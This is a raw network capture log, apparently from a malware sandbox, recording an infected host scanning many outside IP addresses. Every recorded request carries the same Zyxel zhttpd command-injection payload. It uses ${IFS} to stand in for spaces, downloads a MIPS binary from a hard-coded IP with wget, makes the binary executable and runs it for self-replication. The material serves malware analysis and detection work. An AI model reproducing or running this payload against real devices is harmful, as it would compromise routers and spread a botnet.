                                            Jan 14, 2024 15:50:34.328267097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2883192.168.2.2353808196.244.148.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328314066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2884192.168.2.2338954162.99.24.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328326941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2885192.168.2.2353464191.142.113.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328353882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2886192.168.2.2358188205.30.146.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328396082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2887192.168.2.2351272221.53.49.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328418016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2888192.168.2.2340212208.187.218.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328445911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2889192.168.2.235273891.25.109.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328466892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2890192.168.2.2338212206.46.91.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328502893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2891192.168.2.2341320179.119.87.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328504086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2892192.168.2.2340710187.109.191.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328541040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2893192.168.2.2349690153.154.143.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328582048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2894192.168.2.234062642.170.226.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328609943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2895192.168.2.234053652.16.122.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328634977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2896192.168.2.2347000117.61.31.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328680038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2897192.168.2.23523788.76.175.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328702927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2898192.168.2.2349786196.95.88.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328733921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2899192.168.2.235164265.7.102.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328771114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2900192.168.2.2338958144.194.157.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328795910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2901192.168.2.2333014195.25.93.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328831911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2902192.168.2.235444037.185.79.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328851938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2903192.168.2.23408049.219.230.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328870058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2904192.168.2.2351628208.107.32.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328898907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2905192.168.2.235289612.240.145.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328932047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2906192.168.2.2344560108.131.228.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328969955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2907192.168.2.233827251.213.156.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.328983068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2908192.168.2.2349416110.72.7.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329035997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2909192.168.2.2358498121.122.247.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329061985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2910192.168.2.234550842.134.53.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329097033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2911192.168.2.2335138204.24.204.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329099894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2912192.168.2.2350676159.80.100.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329150915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2913192.168.2.233773014.39.83.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329153061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2914192.168.2.2352084146.182.166.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329185009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2915192.168.2.2333970165.208.126.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329193115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2916192.168.2.2349148113.24.0.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329278946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2917192.168.2.2343342172.225.43.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329302073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2918192.168.2.2342504218.166.30.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329327106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2919192.168.2.2337568211.115.29.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329355955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2920192.168.2.235852877.214.82.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329385996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2921192.168.2.2360446181.104.23.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329415083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2922192.168.2.2345012138.103.221.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329449892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2923192.168.2.2338174206.36.206.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329499006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2924192.168.2.2354726216.145.108.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329524994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2925192.168.2.235134872.235.74.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329549074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2926192.168.2.233526654.137.122.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329592943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2927192.168.2.2353312207.237.108.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329617977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2928192.168.2.2348500148.68.37.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329663992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2929192.168.2.2360058112.131.204.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329691887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2930192.168.2.2335780196.204.76.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329708099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2931192.168.2.234342875.85.201.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329741001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2932192.168.2.2343734103.145.248.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329777956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2933192.168.2.2353622201.215.164.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329811096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2934192.168.2.2356634208.7.192.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329833984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2935192.168.2.234049423.46.242.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329864979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2936192.168.2.2335550180.115.222.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329874039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2937192.168.2.2357750220.130.105.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329937935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2938192.168.2.233599857.203.94.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329945087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2939192.168.2.2348780211.14.226.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.329967022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2940192.168.2.2341492205.157.215.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330005884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2941192.168.2.2342332106.127.112.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330027103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2942192.168.2.23588602.190.64.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330070972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2943192.168.2.233528061.87.101.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330086946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2944192.168.2.235336420.6.107.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:34.330099106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2945192.168.2.234804645.69.245.95443
                                            TimestampBytes transferredDirectionData
